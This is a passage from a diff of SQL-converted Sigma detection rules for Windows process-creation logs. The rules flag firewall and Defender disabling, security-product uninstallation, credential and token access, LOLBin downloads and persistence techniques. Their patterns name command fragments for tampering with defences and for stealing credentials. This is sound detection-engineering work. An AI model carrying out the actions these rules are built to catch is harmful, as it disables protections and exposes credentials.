'%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Windows Firewall Disabled via PowerShell", + "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "author": "Tim Rauch", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_powershell_disable_firewall.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Persistence Via TypedPaths - CommandLine", - "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "title": "Suspicious Execution of InstallUtil To Download", + "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_typed_paths_persistence.yml" + "filename": "proc_creation_win_lolbin_installutil_download.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", - "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", - "status": "test", - "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "title": "Sideloading Link.EXE", + "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "status": "experimental", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1218" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" }, { - "title": "Greedy File Deletion Using Del", - "id": "204b17ae-4007-471b-917b-b917b315c5db", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "status": "experimental", - "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", - "author": "frack113", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Very unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_hktl_dumpert.yml" - }, - { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", "tags": [ "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" - ], - "falsepositives": [ - "Printer software / driver installations", - "HP software" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" - ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" - }, - { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "title": "Potential SPN Enumeration Via Setspn.EXE", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", + "author": "Markus Neis, keepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_setspn_spn_enumeration.yml" }, { - "title": "Process Memory Dump Via Dotnet-Dump", - "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "title": "Potential Discovery Activity Via Dnscmd.EXE", + "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "status": "experimental", - "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", + "author": "@gott_cyber", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.execution", + "attack.t1543.003" ], "falsepositives": [ - "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" + "Legitimate administration use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet_dump.yml" + "filename": "proc_creation_win_dnscmd_discovery.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036.002" ], "falsepositives": [ - "Legitimate administration" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Suspicious Csi.exe Usage", + "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ + "attack.execution", + "attack.t1072", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Legitimate usage by software developers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE 